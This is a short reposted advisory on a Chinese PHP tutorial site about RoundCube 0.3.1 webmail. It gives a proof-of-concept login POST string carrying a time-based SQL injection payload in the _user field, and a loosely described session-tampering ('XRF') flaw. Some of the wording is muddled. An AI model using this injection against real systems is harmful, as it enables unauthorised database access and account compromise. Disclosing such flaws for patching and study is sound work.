来源:自学PHP网 时间:2015-04-17 14:47 作者: 阅读:次
[导读] 标题: RoundCube 0.3.1 SQL injection作者: Smith Falcon www.2cto.com下载地址: http://roundcube.net/download版本: 0.3.1测试平台: Linux_timezone=is vulnerable to SQL Union Injection.PO......
|
标题: RoundCube 0.3.1 SQL injection 作者: Smith Falcon www.2cto.com 下载地址: http://roundcube.net/download 版本: 0.3.1 测试平台: Linux _timezone=
is vulnerable to SQL Union Injection. "POST" data in http://www.2cto.com /roundcube/index.php _pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1" XRF缺陷[ POC ] POST variable
changing variable _action=login to "_action=anything" shows you the site is
vulnerable to XRF attacks. When you replay it with HTTP Live headers, you
see a logged in URL which shows the roundcube 0.3.1 is vulnerable to XRF
attacks. Successful tampering will lead to username compromising. _action=loggedin Credits - iqZer0 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
